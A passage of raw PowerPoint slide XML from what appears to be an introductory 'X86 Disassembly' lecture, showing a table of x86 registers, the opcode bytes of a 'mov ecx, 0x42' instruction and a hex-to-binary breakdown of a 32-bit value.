                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Opcodes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>89</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>42 00 00 00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30596241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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a small amount of data storage in CPU</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135421599"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547664" y="2276872"/>
          <a:ext cx="6316790" cy="3235960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1744790"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>General register</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Segment register</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Status register</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (flag)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Instruction pointer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EAX (AX,AH, AL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>CS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EFLAGS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EIP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EBX (BX, BH, BL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>SS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ECX (CX, CH, CL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>DS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EDX (DX, DH, DL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ES</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EBP (BP)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>FS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ESP (SP)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>GS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ESI (SI)</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val="19525630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b="1" dirty="0"/>
              <a:t>Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3356992"/>
            <a:ext cx="3039763"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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="1772816"/>
            <a:ext cx="612068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907704" y="1845694"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634846" y="1841262"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360163" y="1826748"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103782" y="1846565"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842486" y="1856994"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567803" y="1856994"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295239" y="1841262"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020556" y="1846565"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1988840"/>
            <a:ext cx="813043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>32 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3501008"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="3501008"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="3485276"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="3502749"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="4740876"/>
            <a:ext cx="1519881"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4844605" y="4884892"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="4884892"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="4869160"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
